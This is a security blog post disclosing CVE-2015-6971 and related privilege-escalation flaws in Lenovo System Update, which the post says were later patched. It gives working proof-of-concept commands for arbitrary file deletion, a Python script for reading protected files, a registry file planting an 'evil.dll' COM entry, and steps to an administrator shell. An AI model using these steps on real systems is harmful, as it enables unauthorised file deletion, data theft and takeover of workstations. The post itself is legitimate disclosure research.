Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

About Lenovo System Update Vulnerabilities and CVE-2015-6971

Over the past seven months, a number of vulnerabilities in Lenovo System Update software have come to light. Lenovo patched the first of a batch of these vulnerabilities in spring of this year. I decided to take a deeper look at the patches to verify that they fixed the vulnerability. As a result, I discovered a related vulnerability (CVE-2015-6971), which I will explain in detail below.

Background on the software in question

Most Lenovo-branded computers include a piece of software responsible for keeping the system up-to-date. It checks for new versions of drivers and other software (including Windows patches) specific to the computer hardware configuration. Users can download and install updates via the Lenovo System Update as well.

Vulnerabilities discovered

The original vulnerabilities, discovered by security vendor IOActive, were privilege escalation issues that allowed any local user to elevate privileges to SYSTEM by leveraging design flaws in the software. In examining the patched version 5.06.0034, I found that it wasn't fully patched.

Lenovo System Update 5.06.0034 consists of multiple components. One is a Windows Service running as Local System account. This service accepts user commands via a named pipe channel. Another is a client application that is a signed binary, and the service would refuse to execute commands coming from any application except the signed one. The problem is it's trivial to inject code into a running process originating from a signed binary thereby bypassing the security check performed on the service side. Lenovo issued another fix for this issue in September.

Taking a look at the new version 5.07.0008, I encountered a new set of problems: thanks to a legitimate command for it, unprivileged users can delete arbitrary files from the system.

Here is how this works – code below was tested on Windows 10 32-bit:

In case of 64-bit machine replace %ProgramFiles% with %ProgramFiles(x86)% and examine 32-bit registry location (Wow6432Node) where appropriate.

As Administrator, create a file C:\Users\Administrator\Documents\TopSecret.txt and populate it with some text. Save and close it. Now as regular user execute the following in a command prompt:

"%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start

"%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute UACSdk.exe /arguments "A1 A2 C:\Users\Administrator\Documents\TopSecret.txt A3" /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND

Notice that the TopSecret.txt is gone by now. So this issue can be used to cause a denial of service if the file is critical to some system component functioning.

Now let's see how an unprivileged user can read any file via this vulnerability. As a part of internal processing, the Lenovo System Update service copies the arbitrary file specified in the example above (C:\Users\Administrator\Documents\TopSecret.txt) to a predictable location readable by users. This makes it trivial to read it by monitoring this location. I created a simple Python script to demonstrate this type of attack:

import sys
while True:
try:
# Adjust the path below on 64-bit machine
f = open("C:\\Program Files\\Lenovo\\System Update\\temp.reg", "r")
print(f.read())
f.close()
break
except IOError as err:
sys.stdout.write(".")

Save and execute this script as an unprivileged local user on a machine running Lenovo System Update 5.07.0008 and then re-run the TvsuCommandLauncher.exe snippet shown before. Notice that the file's contents will be printed on the screen and the script will stop.

The next issue allows registry manipulation -- unprivileged users can modify the registry under the HKEY_CLASSES_ROOT as they wish.

As proof-of-concept save the following information in C:\Users\Public\S.log via Notepad as Unicode:

REGEDIT

HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32 evil.dll

Now run (as normal user):

"%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start

"%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute uacsdk.exe /arguments "A1 A2 C:\Users\Public\S.log A3" /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND

Now examine the registry and notice the new value is there -- this means an attacker can alter existing entries to load malicious code, for example by replacing the InProcServer32 locations of system components. This is possible thanks to the registry file format used in this exploit being ancient (Windows 3.1-style) and the Lenovo software failing to restrict importing from it.

Finally, there is a nice way to execute commands as an administrator due to a vulnerability in command processing.

To see for yourself, as an unprivileged user run the following:

"%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start

echo test > C:\Users\Public\S.log

"%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute uacsdk.exe /arguments "A1 A2 C:\Users\Public\S.log "" """ /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND

At this point the Lenovo System Update GUI should be visible – keep it open.

Now compile the following small program (copy UNCObject.dll from %ProgramFiles%\Lenovo\System Update\) and run it as the same unprivileged user:

9291_52749f82-d8a9-44c3-a601-8314d43e9619

This will open a Command Prompt window running as user with administrative-level access (as a member of the BUILTIN\Administrators group). The system is then fully controlled by an unprivileged user!

Summing up

Multiple vulnerabilities in Lenovo software allow unprivileged users to gain administrative privileges. This is an especially serious problem in corporate environments where Lenovo software is deployed to each Lenovo-branded workstation. Lenovo recently released a new version (5.07.0013) to address these issues, and I've tested that the attacks I explain above are not possible using the new version.

Latest SpiderLabs Blogs

Welcome to Adventures in Cybersecurity: The Defender Series

I’m happy to say I’m done chasing Microsoft certifications (AZ104/AZ500/SC100), and as a result, I’ve had the time to put some effort into a blog series that hopefully will entertain and inform you...

Read More

Trustwave SpiderLabs: Insights and Solutions to Defend Educational Institutions Against Cyber Threats

Security teams responsible for defending educational institutions at higher education and primary school levels often find themselves facing harsh lessons from threat actors who exploit the numerous...

Read More

Breakdown of Tycoon Phishing-as-a-Service System

Just weeks after Trustwave SpiderLabs reported on the Greatness phishing-as-a-service (PaaS) framework, SpiderLabs’ Email Security team is tracking another PaaS called Tycoon Group.

Read More